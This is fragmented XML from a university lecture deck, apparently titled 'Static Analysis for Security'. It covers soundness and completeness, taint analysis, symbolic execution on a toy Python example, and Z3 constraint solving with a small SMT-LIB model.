                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Roboto Light"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>x = 42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" name="Shape 200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3257012" y="3822277"/>
            <a:ext cx="2325900" cy="5393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latin typeface="Roboto Light"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Concretize</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283883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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1200150"/>
            <a:ext cx="8108950" cy="34766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if x &gt;= 10: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Hack"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Hack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0665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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670560" y="1160780"/>
            <a:ext cx="364744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if x &gt;= 10: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12" name="Shape 212"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5638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------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638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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680720" y="1165839"/>
            <a:ext cx="810895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&gt;= 10</a:t>
            </a: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19" name="Shape 219"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5638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------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4495800" y="302895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6705600" y="301185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 rot="1799800">
            <a:off x="5567453" y="2560304"/>
            <a:ext cx="533453" cy="5788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rot="-1799800">
            <a:off x="6926610" y="2539061"/>
            <a:ext cx="533453" cy="60150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457200" y="1280830"/>
            <a:ext cx="8229599" cy="3533245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31299" y="1403515"/>
            <a:ext cx="300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Over-approximation (sound)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1793916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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701040" y="1180081"/>
            <a:ext cx="360680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&gt;= 10</a:t>
            </a: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solidFill>
                  <a:srgbClr val="000000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00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30" name="Shape 230"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4495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1" name="Shape 231"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="67056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7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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707000" y="1200401"/>
            <a:ext cx="394628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&gt;= 10</a:t>
            </a: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if x &lt; 100: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solidFill>
                  <a:srgbClr val="0000FF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rgbClr val="0000FF"/>
              </a:solidFill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44958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6705600" y="1257301"/>
          <a:ext cx="1678550" cy="16306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9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5257800" y="3028951"/>
          <a:ext cx="1678550" cy="18439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7239000" y="3028951"/>
          <a:ext cx="1678550" cy="18439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ABB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 rot="1799800">
            <a:off x="6636948" y="2539081"/>
            <a:ext cx="533453" cy="6016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-1799800">
            <a:off x="7989204" y="2540757"/>
            <a:ext cx="533453" cy="59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1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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="772160" y="1148583"/>
            <a:ext cx="3728720" cy="3476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x = int(input())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if x &gt;= 10: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if x &lt; 100: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solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Hack"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>vulnerable_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill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solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Hack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else: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func_a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else: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Hack"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Hack"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Hack"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>func_b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Hack"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1800" dirty="0">
              <a:latin typeface="Hack"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Hack"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="250" name="Shape 250"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5638800" y="1371601"/>
          <a:ext cx="1678550" cy="18439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7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State ABA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???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8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Constraints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&gt;= 10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&lt; 100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1" name="Shape 251"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5638800" y="3563396"/>
          <a:ext cx="1678550" cy="11886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18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Concretized ABA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Variables</a:t>
                      </a:r>
                    </a:p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endParaRPr sz="500" dirty="0">
                        <a:latin typeface="Roboto Light"/>
                        <a:cs typeface="Roboto Light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latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>x = 99</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="68569" marB="68569">
                    <a:solidFill>
                      <a:srgbClr val="EFEF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2" name="Shape 252"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248401" y="3149386"/>
            <a:ext cx="533399" cy="4889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28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Constraints: Z3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Z3 is a theorem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>prover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Developed by Microsoft Research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Built to be used by other tools through APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses a functional language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Declaration of constants, variable, functions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When asked to check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>satisfiability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the theorem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>prover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sat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unsat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27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Z3: Validity and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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formula is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>satisfiable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> if there is one assignment of values that satisfies the formula</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A formula is valid if it is true for any assignment of its unassigned symbols (constants, functions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To check if a formula F is valid one has to check that “not F” is not satisfiable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2244273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Z3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(declare-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack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(declare-fun f (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack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(assert (&gt; a 10))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(assert (&lt; (f a true) 100))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(check-sat)</a:t>
            </a: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(get-model)</a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sat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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> 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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-fun a () </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Int</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRP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  11)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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-fun f ((x!1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) (x!2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Int</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRP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  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> (= x!1 11) (= x!2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>)) 0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      0))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>)</a:t>
            </a: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  <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs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2039205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Z3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Z3 supports a number of types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 numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bit vectors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Records (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>struct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Enumerations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95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A5AC-B586-DE33-1926-82E0F80A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AE42-A95E-2EC6-88FE-B0E290F0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is a powerful tool to analyze code without executing it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows for analyzing code that is not easily reachable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Well-suited for non-adversarial code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CodeQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> supports security analysis integrated with GitHub repos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many limitations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>False positives (due to over-approximation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imprecisions (due to incorrect characterization)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>State explosion (for symbolic execution)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1625122" y="1582201"/>
            <a:ext cx="5897792" cy="3142877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35509" y="1238685"/>
            <a:ext cx="437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More precise over-approximation (sound)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279599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2931298" y="2605120"/>
            <a:ext cx="3444100" cy="1539148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10387" y="3254798"/>
            <a:ext cx="34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Under-approximation (complete)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31872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424608" y="2810046"/>
            <a:ext cx="218285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>
            <a:lvl1pPr>
              <a:defRPr i="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rP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1847970" y="1815899"/>
            <a:ext cx="5448061" cy="2674106"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A9A9A9">
              <a:alpha val="25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709349" y="2199143"/>
            <a:ext cx="2647173" cy="34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1887" tIns="31887" rIns="31887" bIns="31887" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Actual run-time behaviors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6" name="Shape 238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965025" y="2854556"/>
            <a:ext cx="3444100" cy="1539148"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="008F00">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="85888D"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="31887" tIns="31887" rIns="31887" bIns="31887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086211" y="3421700"/>
            <a:ext cx="319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/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Unsound, incomplete analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108070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approaches are able to model all behaviors, but are prone to false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Results need to be verified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complete approaches are able to always produce a result that is correct, but are prone to false negatives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One cannot be certain of the absence of a behavior</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223554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Analyses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Shape 27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3890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Control-flow analysis: Find and reason about all possible control-flow transfers (sources and destinations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Data-flow analysis: Reason about how data flows within the application (from sources to sinks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Data-dependency analysis: Reason about how data influences other data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Points-to analysis: Reason about what values pointers can take</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Alias analysis: Determine if two pointers might point to the same address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Value-set analysis: Reason about what are all the possible values that variables can hold</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269262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Roboto Light"/>
            <a:cs typeface="Robot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16010</TotalTime>
  <Words>3272</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>584</Paragraphs>
  <Slides>47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Hack</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Static Analysis for Security “You can observe a lot by just by watching” - Yogi Berra</vt:lpstr>
      <vt:lpstr>Static Analysis</vt:lpstr>
      <vt:lpstr>Soundness and Completeness</vt:lpstr>
      <vt:lpstr>Soundness and Completeness</vt:lpstr>
      <vt:lpstr>Soundness and Completeness</vt:lpstr>
      <vt:lpstr>Soundness and Completeness</vt:lpstr>
      <vt:lpstr>Soundness and Completeness</vt:lpstr>
      <vt:lpstr>Soundness and Completeness</vt:lpstr>
      <vt:lpstr>Example Analyses</vt:lpstr>
      <vt:lpstr>Example: Simple Overflows</vt:lpstr>
      <vt:lpstr>Difficulties</vt:lpstr>
      <vt:lpstr>Difficulties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Static Taint Analysis</vt:lpstr>
      <vt:lpstr>Taint Sources</vt:lpstr>
      <vt:lpstr>Taint Propagation</vt:lpstr>
      <vt:lpstr>Taint Propagation</vt:lpstr>
      <vt:lpstr>Taint Propagation</vt:lpstr>
      <vt:lpstr>Taint Removal</vt:lpstr>
      <vt:lpstr>Taint Sinks</vt:lpstr>
      <vt:lpstr>Static Taint Analysis in C</vt:lpstr>
      <vt:lpstr>CodeQL</vt:lpstr>
      <vt:lpstr>CodeQL Programs</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Path Traversal</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>DataFlow Library</vt:lpstr>
      <vt:lpstr>Symbolic Execution</vt:lpstr>
      <vt:lpstr>Symbolic Execution</vt:lpstr>
      <vt:lpstr>Concretization</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Solving Constraints: Z3</vt:lpstr>
      <vt:lpstr>Z3: Validity and Satisfiability</vt:lpstr>
      <vt:lpstr>Z3 Example</vt:lpstr>
      <vt:lpstr>Z3 Types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Vigna</dc:creator>
  <cp:lastModifiedBy>Giovanni Vigna</cp:lastModifiedBy>
  <cp:revision>618</cp:revision>
  <cp:lastPrinted>2023-11-02T18:04:48Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-19T17:06:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-18T17:59:28Z</dcterms:modified>
</cp:coreProperties>
</file>